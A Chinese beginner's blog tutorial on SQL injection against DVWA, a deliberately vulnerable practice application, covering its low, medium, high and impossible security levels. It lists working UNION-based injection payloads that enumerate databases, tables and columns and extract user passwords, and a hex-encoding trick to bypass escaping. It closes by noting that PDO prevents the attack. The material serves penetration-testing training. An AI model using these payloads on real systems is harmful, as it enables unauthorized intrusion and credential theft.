html sql注入_渗透测试新手入门之DVWA(SQL注入)篇

一、SQL注入概念

SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。

e77df6a46db3b94a966e1ffc716f022f.png

二、手工注入常规思路

1.判断是否存在注入,注入是字符型还是数字型

2.猜解SQL查询语句中的字段数

3.确定回显位置

4.获取当前数据库

5.获取数据库中的表

6.获取表中的字段名

7.得到数据

将DVWA的级别设置为low

1.分析源码,可以看到没有对参数做任何的过滤,直接带入数据库进行查询,分析sql查询语句,可能存在字符型sql注入。

b388cccf99462734b9fa1f7852db6075.png

2.判断sql是否存在存入,以及注入的类型

1' and '1'='1

24398e1f71370cd93e0d62e8aa287ebd.png

3.猜解SQL查询语句中的字段数

3.1 1' order by 2#

3bf72ade4c5269dd4af5cc1560ae4fd6.png

3.2 1' order by 3#

4d5732fcc7d67618f44d8014fb9657f7.png

3.3从上面两个图可以说明,SQL语句查询的表的字段数是2

4.确定显示的位置(SQL语句查询之后的回显位置)

1' union select 1,2# #下图可以看出有2个回显

f0ff448929cf2da42950822f635f1382.png

5.查询当前的数据库,以及版本

1' union select version(),database()#

b6fb6e346074973cc089b8d74a869cc3.png

6.获取数据库中的表

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

4d453979ac4cc292c4d6d6d8530867c8.png

7.获取表中的字段名

1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

cc5562a9a9e93c71b267f11b21f121d0.png

8.获得字段中的数据

1' union select user,password from users#

656a9b48a38e235df93ab6f55aa00530.png

将DVWA的级别设置为Medium

1.下图可以看到中级加入了一些防御,不让用户输入,只提供选择(可以用burpsuit抓包来绕过),分析源码可以看到对参数使用mysql_real_escape_string函数转义sql语句中的一些特殊字符,查看sql查询语句可以看出可能存在数字型sql注入

dcd73a29d1f69b6ccb8bc3cd75346200.png
8574bdd0d1331512ca1e7d31830b8620.png

2.通过burpsuit抓包,修改数据包,绕过防御

2.1判断注入点,以及注入的类型,下图可以看到,存在注入,注入类型是数字型注入

7767690516c3691c1732616b60ed9cc1.png

2.2猜解sql查询语句中的字段的个数,下图说明字段的个数为2

7e58fa2930e0989e52ee734328ee0924.png
0d6bcba3530735f0bb40c561bc6e1857.png

2.3.确定回显的位置,下图可以说明有2个回显位置

1 union select 1,2#

ef3fd834ce661b79c393728a108d9ad6.png

2.4.获取当前数据库的名称以及版本

1 union select database(),version()#

9813ce4c44dce7bf4348dc14e69b9a27.png

2.5获取数据库中的所有表

1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

1996aa41e3b7b82ef88496b435f33fab.png

2.6获取表中的所有字段名

考虑到单引号被转义,可以利用 16 进制进行绕过

union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #

f24d9ee60a97b6b46c46392713063cab.png

2.7获取字段中的数据

1 union select user,password from users#

34d99a8ddd76821e4d57b5234425048e.png

将DVWA的级别设置为High

1.将dvwa设置为高级,可以看出,点击”here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,在sql查询语句中限制了查询条数,可以通过burpsuit抓包,修改数据包实现绕过

b650c0f0fa691ba2aa35a0deaf0e46c8.png
0c88533ce25531e123f863961b6ee5e4.png
0fa3e5530bf6e397afa420c3a7b1de57.png

2.2获得密码

9b8d194db95e5431a1b638217cba5cb4.png

将DVWA的级别设置为Impossible

1.分析源码可以看到使用了PDO技术,杜绝了SQL注入

42720660177efdb107b5a918857f3e32.png
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值